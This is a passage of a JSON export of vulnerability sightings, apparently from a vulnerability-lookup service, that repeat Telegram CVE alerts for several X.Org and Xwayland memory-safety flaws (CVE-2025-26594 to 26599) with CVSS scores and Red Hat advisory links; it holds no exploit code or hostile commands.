CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. The code in XkbVModMaskText() allocates a fixed-sized buffer on the stack and copies the names of the virtual modifiers to that buffer. The code fails to check the bounds of the buffer and would copy the data regardless of the size.\n\ud83d\udccf Published: 2025-02-25T15:54:06.708Z\n\ud83d\udccf Modified: 2025-03-27T04:19:56.000Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26595\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345257", "creation_timestamp": "2025-03-27T04:25:58.000000Z"}, {"uuid": "68020192-6cf0-44c7-956d-7d5008753ec7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2861", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9012", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26595\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. The code in XkbVModMaskText() allocates a fixed-sized buffer on the stack and copies the names of the virtual modifiers to that buffer. The code fails to check the bounds of the buffer and would copy the data regardless of the size.\n\ud83d\udccf Published: 2025-02-25T15:54:06.708Z\n\ud83d\udccf Modified: 2025-03-27T04:19:56.000Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26595\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345257", "creation_timestamp": "2025-03-27T04:25:58.000000Z"}, {"uuid": "6f3701d8-65b6-48cf-b0c5-1ebf81c8a9ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2500", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9008", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26599\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An access to an uninitialized pointer flaw was found in X.Org and Xwayland. The function compCheckRedirect() may fail if it cannot allocate the backing pixmap. In that case, compRedirectWindow() will return a BadAlloc error without validating the window tree marked just before, which leaves the validated data partly initialized and the use of an uninitialized pointer later.\n\ud83d\udccf Published: 2025-02-25T15:55:02.964Z\n\ud83d\udccf Modified: 2025-03-27T04:21:07.505Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26599\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345253", "creation_timestamp": "2025-03-27T04:25:51.000000Z"}, {"uuid": "49b6129a-4234-4150-b265-27c35e713099", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2875", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9008", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26599\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An access to an uninitialized pointer flaw was found in X.Org and Xwayland. The function compCheckRedirect() may fail if it cannot allocate the backing pixmap. In that case, compRedirectWindow() will return a BadAlloc error without validating the window tree marked just before, which leaves the validated data partly initialized and the use of an uninitialized pointer later.\n\ud83d\udccf Published: 2025-02-25T15:55:02.964Z\n\ud83d\udccf Modified: 2025-03-27T04:21:07.505Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26599\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345253", "creation_timestamp": "2025-03-27T04:25:51.000000Z"}, {"uuid": "74cb92cc-70be-429f-a288-77578d1cac35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2861", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9008", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26599\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An access to an uninitialized pointer flaw was found in X.Org and Xwayland. The function compCheckRedirect() may fail if it cannot allocate the backing pixmap. In that case, compRedirectWindow() will return a BadAlloc error without validating the window tree marked just before, which leaves the validated data partly initialized and the use of an uninitialized pointer later.\n\ud83d\udccf Published: 2025-02-25T15:55:02.964Z\n\ud83d\udccf Modified: 2025-03-27T04:21:07.505Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26599\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345253", "creation_timestamp": "2025-03-27T04:25:51.000000Z"}, {"uuid": "efeb1072-bc8c-4834-9a2d-7c30f53e9d6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2865", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9009", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26598\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An out-of-bounds write flaw was found in X.Org and Xwayland. The function GetBarrierDevice() searches for the pointer device based on its device ID and returns the matching value, or supposedly NULL, if no match was found. However, the code will return the last element of the list if no matching device ID is found, which can lead to out-of-bounds memory access.\n\ud83d\udccf Published: 2025-02-25T15:54:57.355Z\n\ud83d\udccf Modified: 2025-03-27T04:20:45.713Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26598\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345254", "creation_timestamp": "2025-03-27T04:25:52.000000Z"}, {"uuid": "bdfa73a1-2aa5-4773-ace2-92f7f86aa16a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2879", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9009", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26598\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An out-of-bounds write flaw was found in X.Org and Xwayland. The function GetBarrierDevice() searches for the pointer device based on its device ID and returns the matching value, or supposedly NULL, if no match was found. However, the code will return the last element of the list if no matching device ID is found, which can lead to out-of-bounds memory access.\n\ud83d\udccf Published: 2025-02-25T15:54:57.355Z\n\ud83d\udccf Modified: 2025-03-27T04:20:45.713Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26598\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345254", "creation_timestamp": "2025-03-27T04:25:52.000000Z"}, {"uuid": "cd13e180-122d-451d-9512-6b496be496d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2866", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9010", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26597\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. If XkbChangeTypesOfKey() is called with a 0 group, it will resize the key symbols table to 0 but leave the key actions unchanged. If the same function is later called with a non-zero value of groups, this will cause a buffer overflow because the key actions are of the wrong size.\n\ud83d\udccf Published: 2025-02-25T15:54:48.196Z\n\ud83d\udccf Modified: 2025-03-27T04:20:29.448Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26597\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345255", "creation_timestamp": "2025-03-27T04:25:53.000000Z"}, {"uuid": "ca5a4013-7876-4701-9652-6d93b4179ded", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2865", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9011", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26596\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A heap overflow flaw was found in X.Org and Xwayland. The computation of the length in XkbSizeKeySyms() differs from what is written in XkbWriteKeySyms(), which may lead to a heap-based buffer overflow.\n\ud83d\udccf Published: 2025-02-25T15:54:23.693Z\n\ud83d\udccf Modified: 2025-03-27T04:20:12.127Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26596\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345256", "creation_timestamp": "2025-03-27T04:25:57.000000Z"}, {"uuid": "fb9b0252-aa1c-4ac6-88f3-6be0aabc4e88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2879", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9011", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26596\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A heap overflow flaw was found in X.Org and Xwayland. The computation of the length in XkbSizeKeySyms() differs from what is written in XkbWriteKeySyms(), which may lead to a heap-based buffer overflow.\n\ud83d\udccf Published: 2025-02-25T15:54:23.693Z\n\ud83d\udccf Modified: 2025-03-27T04:20:12.127Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26596\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345256", "creation_timestamp": "2025-03-27T04:25:57.000000Z"}, {"uuid": "b5252109-d59c-4c30-9701-88fe3dcd9c2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2862", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9011", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26596\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A heap overflow flaw was found in X.Org and Xwayland. The computation of the length in XkbSizeKeySyms() differs from what is written in XkbWriteKeySyms(), which may lead to a heap-based buffer overflow.\n\ud83d\udccf Published: 2025-02-25T15:54:23.693Z\n\ud83d\udccf Modified: 2025-03-27T04:20:12.127Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26596\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345256", "creation_timestamp": "2025-03-27T04:25:57.000000Z"}, {"uuid": "40fe4e81-ff45-483f-a334-699d7966ce40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2866", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9009", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26598\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An out-of-bounds write flaw was found in X.Org and Xwayland. The function GetBarrierDevice() searches for the pointer device based on its device ID and returns the matching value, or supposedly NULL, if no match was found. However, the code will return the last element of the list if no matching device ID is found, which can lead to out-of-bounds memory access.\n\ud83d\udccf Published: 2025-02-25T15:54:57.355Z\n\ud83d\udccf Modified: 2025-03-27T04:20:45.713Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26598\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345254", "creation_timestamp": "2025-03-27T04:25:52.000000Z"}, {"uuid": "550e93c5-fe65-427a-8179-1bed9ea80f24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2880", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9009", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26598\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An out-of-bounds write flaw was found in X.Org and Xwayland. The function GetBarrierDevice() searches for the pointer device based on its device ID and returns the matching value, or supposedly NULL, if no match was found. However, the code will return the last element of the list if no matching device ID is found, which can lead to out-of-bounds memory access.\n\ud83d\udccf Published: 2025-02-25T15:54:57.355Z\n\ud83d\udccf Modified: 2025-03-27T04:20:45.713Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26598\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345254", "creation_timestamp": "2025-03-27T04:25:52.000000Z"}, {"uuid": "c0011d8b-5cde-468e-b66e-b712484b8362", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2862", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9013", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26594\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. The root cursor is referenced in the X server as a global variable. If a client frees the root cursor, the internal reference points to freed memory and causes a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:53:51.324Z\n\ud83d\udccf Modified: 2025-03-27T04:19:40.033Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26594\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345248", "creation_timestamp": "2025-03-27T04:25:59.000000Z"}, {"uuid": "06b5da65-95d8-4296-9270-325c6bb8a199", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2880", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9010", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26597\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. If XkbChangeTypesOfKey() is called with a 0 group, it will resize the key symbols table to 0 but leave the key actions unchanged. If the same function is later called with a non-zero value of groups, this will cause a buffer overflow because the key actions are of the wrong size.\n\ud83d\udccf Published: 2025-02-25T15:54:48.196Z\n\ud83d\udccf Modified: 2025-03-27T04:20:29.448Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26597\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345255", "creation_timestamp": "2025-03-27T04:25:53.000000Z"}, {"uuid": "59974a61-df36-40af-bcda-e525ca7b2e82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2874", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9010", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26597\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. If XkbChangeTypesOfKey() is called with a 0 group, it will resize the key symbols table to 0 but leave the key actions unchanged. If the same function is later called with a non-zero value of groups, this will cause a buffer overflow because the key actions are of the wrong size.\n\ud83d\udccf Published: 2025-02-25T15:54:48.196Z\n\ud83d\udccf Modified: 2025-03-27T04:20:29.448Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26597\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345255", "creation_timestamp": "2025-03-27T04:25:53.000000Z"}, {"uuid": "1784be3e-adcb-4400-8770-5cac414b7549", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2874", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9012", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26595\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. The code in XkbVModMaskText() allocates a fixed-sized buffer on the stack and copies the names of the virtual modifiers to that buffer. The code fails to check the bounds of the buffer and would copy the data regardless of the size.\n\ud83d\udccf Published: 2025-02-25T15:54:06.708Z\n\ud83d\udccf Modified: 2025-03-27T04:19:56.000Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26595\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345257", "creation_timestamp": "2025-03-27T04:25:58.000000Z"}, {"uuid": "bb1995f2-a1e7-4a3e-a527-a920801830dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2502", "type": "seen", "source": 